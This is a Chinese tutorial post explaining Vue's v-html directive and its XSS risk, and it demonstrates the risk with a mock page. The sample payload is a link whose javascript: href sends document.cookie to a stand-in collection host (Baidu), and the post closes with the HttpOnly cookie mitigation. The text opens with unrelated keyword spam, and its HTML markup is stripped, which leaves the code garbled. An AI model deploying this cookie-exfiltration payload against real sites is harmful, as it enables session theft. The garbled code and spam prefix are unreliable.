依波手表价格 官方网站,互联网保险的定义与特点,施工企业春联,现在的网站使用frameset做吗前言#xff1a;v-html指令
1.作用#xff1a;向指定节点中渲染包含html结构的内容。
2.与插值语法的区别#xff1a; (1).v-html会替换掉节点中所有的内容#xff0c;{{xx}}则不会。 (2).v-html可以识别html结构。
3.严重注意#xff1a;v-html有安全性问题#xff0…前言v-html指令
1.作用向指定节点中渲染包含html结构的内容。
2.与插值语法的区别 (1).v-html会替换掉节点中所有的内容{{xx}}则不会。 (2).v-html可以识别html结构。
3.严重注意v-html有安全性问题 (1).在网站上动态渲染任意HTML是非常危险的容易导致XSS攻击。 (2).一定要在可信的内容上使用v-html永不要用在用户提交的内容上
一、代码
制作一个模拟页面使用v-html在页面中插入“jack”jack的href属性写为javascript:location.hrefhttp://www.baidu.com?document.cookie 其中百度的地址为模拟地址真实场景中应该为诈骗人员收集信息的靶机document.cookie命令将会获得页面的全部cookie,并以参数的形式通过URL传递给靶机。
!DOCTYPE html
htmlheadmeta charsetUTF-8 /titlev-html指令/titlescript typetext/javascript src../js/vue.js/script/headbodydiv idrootdiv v-htmljack/div/div/bodyscript typetext/javascriptVue.config.productionTip false //阻止 vue 在启动时生成生产提示。new Vue({el:#root,data:{jack:a hrefjavascript:location.hrefhttp://www.baidu.com?document.cookie点我/a,}})/script
/html
二、页面
通过vue本地环境打开页面为了模拟效果在cookies中模拟数据添加2条数据。 三、运行结果
点击页面的“点我”浏览器跳转到百度页面观察url发现模拟的cookie数据当做参数被传递给了百度。 四、安全设置
当浏览器cookie的HttpOnly设置为 √ 时就表示只能通过Http请求的方式传递Cookie才能够被读取其他时候是不行的所以并不是任何时候都可以通过JavaScript去读取Cookie。若网站没有将一些重要的用户信息设置为HttpOnly这就会导致cookie的泄漏。
